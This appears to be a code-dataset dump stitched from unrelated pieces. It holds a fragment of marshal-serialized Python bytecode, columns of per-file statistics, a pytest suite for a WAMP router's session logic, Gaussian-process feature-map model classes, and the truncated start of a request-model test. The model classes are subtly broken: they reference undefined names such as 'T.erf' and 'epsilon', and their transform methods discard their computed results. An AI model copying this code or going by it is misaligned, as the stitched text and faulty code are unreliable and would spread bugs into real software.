x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01'))
| 76,399.333333
| 229,182
| 0.755295
| 51,642
| 229,198
| 3.352058
| 0.009295
| 0.58729
| 0.557135
| 0.529615
| 0.982895
| 0.980925
| 0.978066
| 0.976067
| 0.974282
| 0.972058
| 0
| 0.406013
| 0.000768
| 229,198
| 2
| 229,183
| 114,599
| 0.34984
| 0
| 0
| 0
| 0
| 3
| 0.788558
| 0.786019
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 19
|
b602e0acc2d3a5a19b09ac08ef3a7c954abaa5cc
| 18,572
|
py
|
Python
|
src/wampyre/tests/test_session.py
|
JohnDoee/wampire
|
37c3bc6c30a97520addad6e0d2e74014dba77d6a
|
[
"MIT"
] | 1
|
2018-07-04T18:44:46.000Z
|
2018-07-04T18:44:46.000Z
|
src/wampyre/tests/test_session.py
|
JohnDoee/wampire
|
37c3bc6c30a97520addad6e0d2e74014dba77d6a
|
[
"MIT"
] | 1
|
2018-11-23T03:59:44.000Z
|
2018-11-23T03:59:44.000Z
|
src/wampyre/tests/test_session.py
|
JohnDoee/wampire
|
37c3bc6c30a97520addad6e0d2e74014dba77d6a
|
[
"MIT"
] | null | null | null |
import pytest
from ..opcodes import OP
from ..pattern import Pattern
from ..realm import realm_manager
from ..session import STATE_CLOSED, STATE_UNAUTHENTICATED
from ..transports.base import TransportBase
def transport_base():
class TestTransportBase(TransportBase):
def __init__(self):
self._sends = []
self._closed = False
self._last_id = 0
self._method_uri_allowed = lambda method, uri: True
super().__init__()
def send(self, opcode, *args):
self._sends.append((opcode, args))
def realm_allowed(self, realm):
return "realm_deny" not in realm
def close_session(self):
self._closed = True
def set_state(self, state):
self.session.state = state
def get_reply(self):
return self._sends.pop()
def is_empty(self):
return not self._sends
def generate_id(self):
self._last_id += 1
return self._last_id
def connect(self, realm):
self.receive(OP.HELLO, realm, {})
return self.get_reply()
def disconnect(self):
self.session.close_session()
def method_uri_allowed(self, method, uri):
return self._method_uri_allowed(method, uri)
return TestTransportBase()
@pytest.fixture
def transport():
yield transport_base()
realm_manager.realms = {}
@pytest.fixture
def transport2():
yield transport_base()
realm_manager.realms = {}
@pytest.fixture
def transport3():
yield transport_base()
realm_manager.realms = {}
def test_hello_goodbye(transport):
transport.receive(OP.HELLO, "a.realm", {})
opcode, args = transport.get_reply()
assert opcode == OP.WELCOME
assert Pattern("id", "dict")(*args)
transport.receive(OP.GOODBYE, {}, "wamp.close.goodbye_and_out")
opcode, args = transport.get_reply()
assert opcode == OP.GOODBYE
assert Pattern("dict", "uri!")(*args)
def test_subscribe_unsubscribe(transport, transport2, transport3):
transport.connect("a.realm")
transport2.connect("a.realm")
transport3.connect("a.realm")
transport.receive(
OP.PUBLISH, transport.generate_id(), {}, "a.topic", ["a"], {"b": "c"}
)
assert transport.is_empty()
assert transport2.is_empty()
assert transport3.is_empty()
transport2.receive(OP.SUBSCRIBE, transport2.generate_id(), {}, "a.topic")
opcode, args = transport2.get_reply()
assert opcode == OP.SUBSCRIBED
assert Pattern("id", "id")(*args)
assert transport2._last_id == args[0]
transport2_a_topic_subscription_id = args[1]
transport.receive(
OP.PUBLISH, transport.generate_id(), {}, "a.topic", ["a"], {"b": "c"}
)
opcode, args = transport2.get_reply()
assert opcode == OP.EVENT
assert Pattern("id", "id", "dict", "list", "dict")(*args)
assert args[0] == transport2_a_topic_subscription_id
assert args[3] == ["a"]
assert args[4] == {"b": "c"}
assert transport.is_empty()
assert transport2.is_empty()
assert transport3.is_empty()
transport3.receive(OP.SUBSCRIBE, transport3.generate_id(), {}, "a.topic")
opcode, args = transport3.get_reply()
assert opcode == OP.SUBSCRIBED
transport3_a_topic_subscription_id = args[1]
transport2.receive(
OP.PUBLISH, transport2.generate_id(), {}, "a.topic", ["b"], {"c": "d"}
)
opcode, args = transport2.get_reply()
assert opcode == OP.EVENT
assert Pattern("id", "id", "dict", "list", "dict")(*args)
assert args[0] == transport2_a_topic_subscription_id
assert args[3] == ["b"]
assert args[4] == {"c": "d"}
opcode, args = transport3.get_reply()
assert opcode == OP.EVENT
assert Pattern("id", "id", "dict", "list", "dict")(*args)
assert args[0] == transport3_a_topic_subscription_id
assert args[3] == ["b"]
assert args[4] == {"c": "d"}
assert transport.is_empty()
assert transport2.is_empty()
assert transport3.is_empty()
transport2.receive(
OP.UNSUBSCRIBE, transport2.generate_id(), transport2_a_topic_subscription_id
)
opcode, args = transport2.get_reply()
assert opcode == OP.UNSUBSCRIBED
assert Pattern("id")(*args)
assert transport2._last_id == args[0]
transport2.receive(
OP.PUBLISH, transport2.generate_id(), {}, "a.topic", ["b"], {"c": "d"}
)
opcode, args = transport3.get_reply()
assert transport.is_empty()
assert transport2.is_empty()
assert transport3.is_empty()
transport3.receive(
OP.UNSUBSCRIBE, transport3.generate_id(), transport3_a_topic_subscription_id
)
opcode, args = transport3.get_reply()
assert opcode == OP.UNSUBSCRIBED
assert Pattern("id")(*args)
assert transport3._last_id == args[0]
transport2.receive(
OP.PUBLISH, transport2.generate_id(), {}, "a.topic", ["b"], {"c": "d"}
)
assert transport.is_empty()
assert transport2.is_empty()
assert transport3.is_empty()
transport3.receive(OP.SUBSCRIBE, transport3.generate_id(), {}, "a.topic")
opcode, args = transport3.get_reply()
assert opcode == OP.SUBSCRIBED
transport3_a_topic_subscription_id = args[1]
transport.receive(
OP.PUBLISH, transport.generate_id(), {"acknowledge": True}, "a.topic", ["b"]
)
opcode, args = transport.get_reply()
assert opcode == OP.PUBLISHED
assert Pattern("id", "id")(*args)
assert transport._last_id == args[0]
opcode, args = transport3.get_reply()
assert opcode == OP.EVENT
assert Pattern("id", "id", "dict", "list")(*args)
assert args[0] == transport3_a_topic_subscription_id
assert args[3] == ["b"]
assert transport.is_empty()
assert transport2.is_empty()
assert transport3.is_empty()
def test_register_call_yield(transport, transport2, transport3):
transport.connect("a.realm")
transport2.connect("a.realm")
transport3.connect("a.realm")
transport.receive(OP.REGISTER, transport.generate_id(), {}, "a.procedure")
opcode, args = transport.get_reply()
assert opcode == OP.REGISTERED
assert Pattern("id", "id")(*args)
assert transport._last_id == args[0]
assert transport.is_empty()
transport_register_id = args[1]
transport3.receive(OP.REGISTER, transport.generate_id(), {}, "a.procedure.2")
opcode, args = transport3.get_reply()
transport2.receive(
OP.CALL, transport2.generate_id(), {}, "a.procedure", ["a"], {"b": "c"}
)
assert transport2.is_empty()
opcode, args = transport.get_reply()
assert opcode == OP.INVOCATION
assert Pattern("id", "id", "dict", "list", "dict")(*args)
assert transport.is_empty()
assert args[1] == transport_register_id
assert args[3] == ["a"]
assert args[4] == {"b": "c"}
transport.receive(OP.YIELD, args[0], {}, ["c"], {"d": "e"})
assert transport.is_empty()
assert transport3.is_empty()
opcode, args = transport2.get_reply()
assert opcode == OP.RESULT
assert transport2._last_id == args[0]
assert args[2] == ["c"]
assert args[3] == {"d": "e"}
assert transport.is_empty()
assert transport2.is_empty()
assert transport3.is_empty()
def test_inter_realm_communication(transport, transport2):
transport.connect("a.realm")
transport2.connect("another.realm")
transport2.receive(OP.SUBSCRIBE, transport2.generate_id(), {}, "a.topic")
opcode, args = transport2.get_reply()
transport.receive(
OP.PUBLISH, transport.generate_id(), {}, "a.topic", ["a"], {"b": "c"}
)
assert transport.is_empty()
assert transport2.is_empty()
def test_failed_register_unregister(transport, transport2):
transport.connect("a.realm")
transport2.connect("a.realm")
transport.receive(OP.REGISTER, transport.generate_id(), {}, "a.procedure")
opcode, args = transport.get_reply()
assert opcode == OP.REGISTERED
assert Pattern("id", "id")(*args)
assert transport._last_id == args[0]
assert transport.is_empty()
transport_register_id = args[1]
transport.receive(OP.REGISTER, transport.generate_id(), {}, "a.procedure")
opcode, args = transport.get_reply()
assert opcode == OP.ERROR
assert Pattern("opcode", "id", "dict", "uri!")(*args)
assert args[0] == OP.REGISTER
assert args[3] == "wamp.error.procedure_already_exists"
assert transport.is_empty()
transport2.receive(OP.REGISTER, transport2.generate_id(), {}, "a.procedure")
opcode, args = transport2.get_reply()
assert opcode == OP.ERROR
assert Pattern("opcode", "id", "dict", "uri!")(*args)
assert args[0] == OP.REGISTER
assert args[3] == "wamp.error.procedure_already_exists"
assert transport2.is_empty()
transport2.receive(OP.UNREGISTER, transport2.generate_id(), transport_register_id)
opcode, args = transport2.get_reply()
assert opcode == OP.ERROR
assert Pattern("opcode", "id", "dict", "uri!")(*args)
assert args[0] == OP.UNREGISTER
assert args[3] == "wamp.error.no_such_registration"
assert transport2.is_empty()
transport.receive(OP.UNREGISTER, transport.generate_id(), transport_register_id)
opcode, args = transport.get_reply()
assert opcode == OP.UNREGISTERED
assert Pattern("id")(*args)
assert args[0] == transport._last_id
assert transport.is_empty()
transport.receive(OP.UNREGISTER, transport.generate_id(), transport_register_id)
opcode, args = transport.get_reply()
assert opcode == OP.ERROR
assert Pattern("opcode", "id", "dict", "uri!")(*args)
assert args[0] == OP.UNREGISTER
assert args[3] == "wamp.error.no_such_registration"
assert transport.is_empty()
def test_failed_mixed_unsubscribe(transport, transport2):
transport.connect("a.realm")
transport2.connect("a.realm")
transport.receive(OP.SUBSCRIBE, transport.generate_id(), {}, "a.topic")
opcode, args = transport.get_reply()
transport_a_topic_subscription_id = args[1]
transport2.receive(
OP.UNSUBSCRIBE, transport2.generate_id(), transport_a_topic_subscription_id
)
opcode, args = transport2.get_reply()
assert opcode == OP.ERROR
assert Pattern("opcode", "id", "dict", "uri!")(*args)
assert args[0] == OP.UNSUBSCRIBE
assert args[3] == "wamp.error.no_such_subscription"
assert transport2.is_empty()
transport.receive(
OP.UNSUBSCRIBE, transport.generate_id(), transport_a_topic_subscription_id
)
opcode, args = transport.get_reply()
assert opcode == OP.UNSUBSCRIBED
assert Pattern("id")(*args)
assert transport.is_empty()
transport.receive(
OP.UNSUBSCRIBE, transport.generate_id(), transport_a_topic_subscription_id
)
opcode, args = transport.get_reply()
assert opcode == OP.ERROR
assert Pattern("opcode", "id", "dict", "uri!")(*args)
assert args[0] == OP.UNSUBSCRIBE
assert args[3] == "wamp.error.no_such_subscription"
assert transport.is_empty()
def test_call_invocation_error(transport, transport2):
transport.connect("a.realm")
transport2.connect("a.realm")
transport.receive(OP.REGISTER, transport.generate_id(), {}, "a.procedure")
opcode, args = transport.get_reply()
transport2.receive(
OP.CALL, transport2.generate_id(), {}, "a.procedure", ["a"], {"b": "c"}
)
opcode, args = transport.get_reply()
transport.receive(
OP.ERROR,
OP.INVOCATION,
args[0],
{},
"a.procedure.error.no_happy_time",
["a"],
{"b": "c"},
)
opcode, args = transport2.get_reply()
assert opcode == OP.ERROR
assert Pattern("opcode", "id", "dict", "uri", "list", "dict")(*args)
assert args[0] == OP.CALL
assert args[1] == transport2._last_id
assert args[3] == "a.procedure.error.no_happy_time"
assert transport2.is_empty()
def test_call_unknown(transport):
transport.connect("a.realm")
transport.receive(
OP.CALL, transport.generate_id(), {}, "a.procedure", ["a"], {"b": "c"}
)
opcode, args = transport.get_reply()
assert opcode == OP.ERROR
assert Pattern("opcode", "id", "dict", "uri!")(*args)
assert args[0] == OP.CALL
assert args[1] == transport._last_id
assert args[3] == "wamp.error.no_such_procedure"
assert transport.is_empty()
def test_call_connection_lost(transport, transport2):
transport.connect("a.realm")
transport2.connect("a.realm")
transport.receive(OP.REGISTER, transport.generate_id(), {}, "a.procedure")
opcode, args = transport.get_reply()
transport2.receive(
OP.CALL, transport2.generate_id(), {}, "a.procedure", ["a"], {"b": "c"}
)
transport.disconnect()
opcode, args = transport2.get_reply()
assert opcode == OP.ERROR
assert Pattern("opcode", "id", "dict", "uri!")(*args)
assert args[0] == OP.CALL
assert args[1] == transport._last_id
assert args[3] == "wamp.error.callee_lost"
assert transport2.is_empty()
def test_connection_lost_unregister_disable_calls(transport, transport2):
transport.connect("a.realm")
transport2.connect("a.realm")
transport2.receive(OP.REGISTER, transport2.generate_id(), {}, "a.procedure")
opcode, args = transport2.get_reply()
transport2.receive(OP.SUBSCRIBE, transport2.generate_id(), {}, "a.topic")
opcode, args = transport2.get_reply()
transport2.disconnect()
transport.receive(
OP.CALL, transport.generate_id(), {}, "a.procedure", ["a"], {"b": "c"}
)
opcode, args = transport.get_reply()
assert opcode == OP.ERROR
assert Pattern("opcode", "id", "dict", "uri!")(*args)
assert args[0] == OP.CALL
assert args[1] == transport._last_id
assert args[3] == "wamp.error.no_such_procedure"
assert transport.is_empty()
transport.receive(
OP.PUBLISH, transport.generate_id(), {}, "a.topic", ["b"], {"c": "d"}
)
def test_invalid_opcodes_syntaxes(transport):
assert transport.session.state == STATE_UNAUTHENTICATED
transport.connect("a.realm")
transport.receive(OP.REGISTER, transport.generate_id(), "a.bogus.procedure")
opcode, args = transport.get_reply()
assert opcode == OP.ABORT
assert Pattern("dict", "uri!")(*args)
assert args[1] == "wamp.error.protocol_violation"
assert transport.is_empty()
assert transport.session.state == STATE_CLOSED
transport.connect("a.realm")
transport.receive(500000, transport.generate_id(), "a.bogus.procedure")
opcode, args = transport.get_reply()
assert opcode == OP.ABORT
assert Pattern("dict", "uri!")(*args)
assert args[1] == "wamp.error.protocol_violation"
assert transport.is_empty()
assert transport.session.state == STATE_CLOSED
transport.connect("a.realm")
transport.receive(OP.HELLO, "a.realm", {})
opcode, args = transport.get_reply()
assert opcode == OP.ABORT
assert Pattern("dict", "uri!")(*args)
assert args[1] == "wamp.error.protocol_violation"
assert transport.is_empty()
assert transport.session.state == STATE_CLOSED
def test_inaccessible_realm(transport):
opcode, args = transport.connect("a.realm_deny")
assert opcode == OP.ABORT
assert Pattern("dict", "uri!")(*args)
assert args[1] == "wamp.error.no_such_realm"
assert transport.is_empty()
assert transport.session.state == STATE_CLOSED
def test_uri_denied(transport):
transport.connect("a.realm")
transport._method_uri_allowed = lambda method, uri: uri == "b.topic"
transport.receive(OP.SUBSCRIBE, transport.generate_id(), {}, "a.topic")
opcode, args = transport.get_reply()
assert opcode == OP.ERROR
assert Pattern("opcode", "id", "dict", "uri!")(*args)
assert args[0] == OP.SUBSCRIBE
assert args[3] == "wamp.error.not_authorized"
assert transport.is_empty()
transport.receive(OP.SUBSCRIBE, transport.generate_id(), {}, "b.topic")
opcode, args = transport.get_reply()
assert opcode == OP.SUBSCRIBED
assert Pattern("id", "id")(*args)
assert transport._last_id == args[0]
def test_subscribe_wildcard(transport, transport2, transport3):
transport.connect("a.realm")
transport2.connect("a.realm")
transport3.connect("a.realm")
transport.receive(
OP.SUBSCRIBE, transport.generate_id(), {"match": "wildcard"}, "a..topic"
)
opcode, args = transport.get_reply()
assert opcode == OP.SUBSCRIBED
assert Pattern("id", "id")(*args)
assert transport._last_id == args[0]
transport_a_topic_subscription_id = args[1]
transport2.receive(
OP.PUBLISH, transport.generate_id(), {}, "a.good.topic", ["a"], {"b": "c"}
)
opcode, args = transport.get_reply()
assert opcode == OP.EVENT
assert Pattern("id", "id", "dict", "list", "dict")(*args)
assert args[0] == transport_a_topic_subscription_id
assert args[2] == {"topic": "a.good.topic"}
assert args[3] == ["a"]
assert args[4] == {"b": "c"}
transport.receive(
OP.UNSUBSCRIBE, transport.generate_id(), transport_a_topic_subscription_id
)
opcode, args = transport.get_reply()
assert opcode == OP.UNSUBSCRIBED
assert Pattern("id")(*args)
assert transport._last_id == args[0]
transport2.receive(
OP.PUBLISH, transport.generate_id(), {}, "a.good.topic", ["a"], {"b": "c"}
)
assert transport.is_empty()
def test_register_wildcard(transport, transport2, transport3):
transport.connect("a.realm")
transport2.connect("a.realm")
transport3.connect("a.realm")
transport.receive(
OP.REGISTER, transport.generate_id(), {"match": "wildcard"}, "a..procedure"
)
opcode, args = transport.get_reply()
assert opcode == OP.REGISTERED
assert Pattern("id", "id")(*args)
assert transport._last_id == args[0]
assert transport.is_empty()
transport_register_id = args[1]
transport3.receive(OP.REGISTER, transport.generate_id(), {"match": "prefix"}, "a")
opcode, args = transport3.get_reply()
transport2.receive(
OP.CALL, transport2.generate_id(), {}, "a.cool.procedure", ["a"], {"b": "c"}
)
assert transport2.is_empty()
opcode, args = transport.get_reply()
assert opcode == OP.INVOCATION
assert Pattern("id", "id", "dict", "list", "dict")(*args)
assert transport.is_empty()
assert args[1] == transport_register_id
assert args[2] == {"procedure": "a.cool.procedure"}
assert args[3] == ["a"]
assert args[4] == {"b": "c"}
assert transport3.is_empty()
| 32.411867
| 86
| 0.654803
| 2,261
| 18,572
| 5.209642
| 0.05617
| 0.046693
| 0.046354
| 0.064522
| 0.866287
| 0.846591
| 0.811105
| 0.783513
| 0.761185
| 0.740301
| 0
| 0.014324
| 0.191794
| 18,572
| 572
| 87
| 32.468531
| 0.77042
| 0
| 0
| 0.71116
| 0
| 0
| 0.088251
| 0.026707
| 0
| 0
| 0
| 0
| 0.431072
| 1
| 0.065646
| false
| 0
| 0.013129
| 0.008753
| 0.09628
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3749f59a1f30b7b20cfed75a48005fff681711ff
| 9,648
|
py
|
Python
|
GPoFM/models/GPoNNet.py
|
MaxInGaussian/GPoFM
|
b7ddfa3361f7e55fb4ca29a2355f4b860bb90e9c
|
[
"BSD-3-Clause"
] | 4
|
2017-12-08T07:51:23.000Z
|
2020-08-02T16:47:04.000Z
|
GPoFM/models/GPoNNet.py
|
MaxInGaussian/GPoFM
|
b7ddfa3361f7e55fb4ca29a2355f4b860bb90e9c
|
[
"BSD-3-Clause"
] | null | null | null |
GPoFM/models/GPoNNet.py
|
MaxInGaussian/GPoFM
|
b7ddfa3361f7e55fb4ca29a2355f4b860bb90e9c
|
[
"BSD-3-Clause"
] | null | null | null |
"""
GPoFM: Gaussian Process Training with
Optimized Feature Maps for Shift-Invariant Kernels
Github: https://github.com/MaxInGaussian/GPoFM
Author: Max W. Y. Lam [maxingaussian@gmail.com]
"""
import sys, os, string, time
import numpy as np
import numpy.random as npr
from theano import tensor as TT
from . import Model
__all__ = [
"GPoReLU",
"GPoTanh",
"GPoMax",
]
class GPoReLU(Model):
'''
The :class:`GPoReLU` class implemented a GPoFM model:
Gaussian process Optimizing Rectifier Feature Maps (GPoReLU)
Parameters
----------
nfeats : an integer
Number of Neurons
penalty : a float
Penalty for prevention of overfitting
transform : a bool
Idicator that determines whether tranform the data before training
X_trans : a string
Transformation method used for inputs of training data
y_trans : a string
Transformation method used for outpus of training data
verbose : a bool
Idicator that determines whether printing training message or not
'''
setting, compiled_funcs = None, None
def __init__(self, nfeats, resolution=0.5, penalty=1., transform=True, **args):
super(GPoReLU, self).__init__(nfeats, resolution, penalty, transform, **args)
def __str__(self):
return "GPoReLU (%d, %.2f, %.2f)"%(self.setting['nfeats'], self.setting['resolution'], self.setting['penalty'])
def randomized_params(self):
S = self.setting['nfeats']
rand_params = []
const = npr.randn(2)*1e-2
l = npr.randn(self.D)
f = npr.randn(self.D*S)
p = 2*np.pi*npr.rand(S)
rand_params = [const, l, f, p]
if(self.setting['transform']):
lm = 2*np.pi*npr.rand(self.D+1)
rand_params.append(lm)
return rand_params
def feature_maps(self, X, params):
t_ind, S = 0, self.setting['nfeats']
a = params[0]; t_ind+=1; b = params[1]; t_ind+=1
sig2_n, sig2_f = 1/(1+TT.exp(a))*self.setting['resolution'], TT.exp(b)
l = params[t_ind:t_ind+self.D]; t_ind+=self.D
f = params[t_ind:t_ind+self.D*S]; t_ind+=self.D*S
F = TT.reshape(f, (self.D, S))/np.exp(l[:, None])
p = params[t_ind:t_ind+S]; t_ind+=S
P = TT.reshape(p, (1, S))-TT.mean(F, 0)[None, :]
FF = TT.dot(X, F)+P
Phi = TT.log(1+TT.exp(FF))*TT.sqrt(sig2_f/FF.shape[1])
if(type(X) == TT.TensorVariable):
return sig2_n, sig2_f, FF, Phi
return Phi
def transform_inputs(self, params):
if(not self.setting['transform']):
return super(GPoReLU, self).transform_inputs(params)
sign = lambda x: TT.tanh(x*1e3)
cdf = lambda x: .5*(1+T.erf(x/T.sqrt(2+epsilon)+epsilon))
X = TT.dmatrices('X')
X_lm = params[-(self.D+1):-1][None, :]
X = (sign(X)*TT.sqrt(X**2)**X_lm-1)/X_lm
return cdf(X)
def transform_outputs(self, params, inverse=None):
if(not self.setting['transform']):
return super(GPoReLU, self).transform_outputs(params)
sign = lambda x: TT.tanh(x*1e3)
y_lm = params[-1]
if(inverse is not None):
ty = inverse*y_lm+1
ty = sign(ty)*TT.sqrt(ty**2)**(1./y_lm)
return ty
y = TT.dmatrices('y')
ty = (sign(y)*TT.sqrt(y**2)**y_lm-1)/y_lm
return y
class GPoTanh(Model):
'''
The :class:`GPoTanh` class implemented a GPoFM model:
Gaussian process Optimizing Tanh Feature Maps (GPoTanh)
Parameters
----------
nfeats : an integer
Number of Neurons
penalty : a float
Penalty for prevention of overfitting
transform : a bool
Idicator that determines whether tranform the data before training
X_trans : a string
Transformation method used for inputs of training data
y_trans : a string
Transformation method used for outpus of training data
verbose : a bool
Idicator that determines whether printing training message or not
'''
setting, compiled_funcs = None, None
def __init__(self, nfeats, resolution=0.5, penalty=1., transform=True, **args):
super(GPoTanh, self).__init__(nfeats, resolution, penalty, transform, **args)
def __str__(self):
return "GPoTanh (%d, %.2f, %.2f)"%(self.setting['nfeats'], self.setting['resolution'], self.setting['penalty'])
def randomized_params(self):
S = self.setting['nfeats']
rand_params = []
const = npr.randn(2)*1e-2
l = npr.randn(self.D)
f = npr.randn(self.D*S)
p = 2*np.pi*npr.rand(S)
rand_params = [const, l, f, p]
if(self.setting['transform']):
lm = 2*np.pi*npr.rand(self.D+1)
rand_params.append(lm)
return rand_params
def feature_maps(self, X, params):
t_ind, S = 0, self.setting['nfeats']
a = params[0]; t_ind += 1; b = params[1]; t_ind += 1
sig2_n, sig2_f = 1/(1+TT.exp(a))*self.setting['resolution'], TT.exp(b)
l = params[t_ind:t_ind+self.D]; t_ind += self.D
f = params[t_ind:t_ind+self.D*S]; t_ind += self.D*S
F = TT.reshape(f, (self.D, S))/np.exp(l[:, None])
p = params[t_ind:t_ind+S]; t_ind += S
P = TT.reshape(p, (1, S))-TT.mean(F, 0)[None, :]
FF = TT.dot(X, F)+P
Phi = TT.tanh(FF)*TT.sqrt(sig2_f/FF.shape[1])
if(type(X) == TT.TensorVariable):
return sig2_n, sig2_f, FF, Phi
return Phi
def transform_inputs(self, params):
if(not self.setting['transform']):
return super(GPoTanh, self).transform_inputs(params)
sign = lambda x: TT.tanh(x*1e3)
cdf = lambda x: .5*(1+T.erf(x/T.sqrt(2+epsilon)+epsilon))
X = TT.dmatrices('X')
X_lm = params[-(self.D+1):-1][None, :]
X = (sign(X)*TT.sqrt(X**2)**X_lm-1)/X_lm
return cdf(X)
def transform_outputs(self, params, inverse=None):
if(not self.setting['transform']):
return super(GPoTanh, self).transform_outputs(params)
sign = lambda x: TT.tanh(x*1e3)
y_lm = params[-1]
if(inverse is not None):
ty = inverse*y_lm+1
ty = sign(ty)*TT.sqrt(ty**2)**(1./y_lm)
return ty
y = TT.dmatrices('y')
ty = (sign(y)*TT.sqrt(y**2)**y_lm-1)/y_lm
return y
class GPoMax(Model):
'''
The :class:`GPoMax` class implemented a GPoFM model:
Gaussian process Optimizing Maxout Feature Maps (GPoMax)
Parameters
----------
nfeats : an integer
Number of Neurons
penalty : a float
Penalty for prevention of overfitting
transform : a bool
Idicator that determines whether tranform the data before training
X_trans : a string
Transformation method used for inputs of training data
y_trans : a string
Transformation method used for outpus of training data
verbose : a bool
Idicator that determines whether printing training message or not
'''
setting, compiled_funcs = None, None
def __init__(self, nfeats, resolution=0.5, penalty=1., transform=True, **args):
super(GPoMax, self).__init__(nfeats, resolution, penalty, transform, **args)
def __str__(self):
return "GPoMax (%d, %.2f, %.2f)"%(self.setting['nfeats'], self.setting['resolution'], self.setting['penalty'])
def randomized_params(self):
S = self.setting['nfeats']
rand_params = []
const = npr.randn(2)*1e-2
l = npr.randn(self.D)
f = npr.randn(self.D*S)
p = 2*np.pi*npr.rand(S)
rand_params = [const, l, f, p]
if(self.setting['transform']):
lm = 2*np.pi*npr.rand(self.D+1)
rand_params.append(lm)
return rand_params
def feature_maps(self, X, params):
t_ind, S = 0, self.setting['nfeats']
a = params[0]; t_ind += 1; b = params[1]; t_ind += 1
sig2_n, sig2_f = 1/(1+TT.exp(a))*self.setting['resolution'], TT.exp(b)
l = params[t_ind:t_ind+self.D]; t_ind += self.D
f = params[t_ind:t_ind+self.D*S]; t_ind += self.D*S
F = TT.reshape(f, (self.D, S))/np.exp(l[:, None])
p = params[t_ind:t_ind+S]; t_ind += S
P = TT.reshape(p, (1, S))-TT.mean(F, 0)[None, :]
FF = TT.dot(X, F)+P
Phi = TT.max(FF, axis=1)[:, None]
for i in range(1, int(S*0.8)):
Phi = TT.concatenate((
TT.max(FF[:, i:], axis=1)[:, None], Phi), axis=1)
Phi = Phi*TT.sqrt(sig2_f/FF.shape[1])
if(type(X) == TT.TensorVariable):
return sig2_n, sig2_f, FF, Phi
return Phi
def transform_inputs(self, params):
if(not self.setting['transform']):
return super(GPoMax, self).transform_inputs(params)
sign = lambda x: TT.tanh(x*1e3)
cdf = lambda x: .5*(1+T.erf(x/T.sqrt(2+epsilon)+epsilon))
X = TT.dmatrices('X')
X_lm = params[-(self.D+1):-1][None, :]
X = (sign(X)*TT.sqrt(X**2)**X_lm-1)/X_lm
return cdf(X)
def transform_outputs(self, params, inverse=None):
if(not self.setting['transform']):
return super(GPoMax, self).transform_outputs(params)
sign = lambda x: TT.tanh(x*1e3)
y_lm = params[-1]
if(inverse is not None):
ty = inverse*y_lm+1
ty = sign(ty)*TT.sqrt(ty**2)**(1./y_lm)
return ty
y = TT.dmatrices('y')
ty = (sign(y)*TT.sqrt(y**2)**y_lm-1)/y_lm
return y
| 36
| 119
| 0.576078
| 1,424
| 9,648
| 3.794944
| 0.103933
| 0.026647
| 0.013323
| 0.019985
| 0.896558
| 0.896558
| 0.896558
| 0.896558
| 0.867691
| 0.867691
| 0
| 0.019501
| 0.277156
| 9,648
| 267
| 120
| 36.134831
| 0.755377
| 0.198072
| 0
| 0.815029
| 0
| 0
| 0.041783
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.104046
| false
| 0
| 0.028902
| 0.017341
| 0.306358
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37aa52347915cb5a71ebd7a12db9e5e6f7fe34e5
| 10,599
|
py
|
Python
|
test/ui/req/test_model.py
|
RaT0M/multiply-ui
|
ad7fffb15cc962604340b31b38d34bc470fa8448
|
[
"MIT"
] | null | null | null |
test/ui/req/test_model.py
|
RaT0M/multiply-ui
|
ad7fffb15cc962604340b31b38d34bc470fa8448
|
[
"MIT"
] | 20
|
2019-05-21T10:33:36.000Z
|
2019-12-11T08:13:29.000Z
|
test/ui/req/test_model.py
|
RaT0M/multiply-ui
|
ad7fffb15cc962604340b31b38d34bc470fa8448
|
[
"MIT"
] | 1
|
2020-10-14T12:32:36.000Z
|
2020-10-14T12:32:36.000Z
|
import unittest
from multiply_ui.ui.req.model import InputRequest, ProcessingRequest, InputIdentifiers
class RequestModelTest(unittest.TestCase):
def test_input_request(self):
input_request = InputRequest(dict(name='bibo',
roi='POLYGON ((7.890891 51.997565, 7.890891 53.066801, '
'9.033867000000001 53.066801, 9.033867000000001 51.997565, '
'7.890891 51.997565))',
timeRange=['2018-07-06', '2018-07-20'],
timeStep=4,
timeStepUnit='days',
spatialResolution=20,
inputTypes=['S2_L1C'],
forwardModels=[
dict(name='s1_sail',
type='kafka',
modelDataType='Sentinel-1',
requiredPriors=['rgwf6', 'fg6'],
outputParameters=['LAI'])],
userPriors=[
dict(name='LAI',
mu=0.2,
unc=0.01),
dict(name='ALA',
mu=1.3),
dict(name='fzxh',
unc=0.01)],
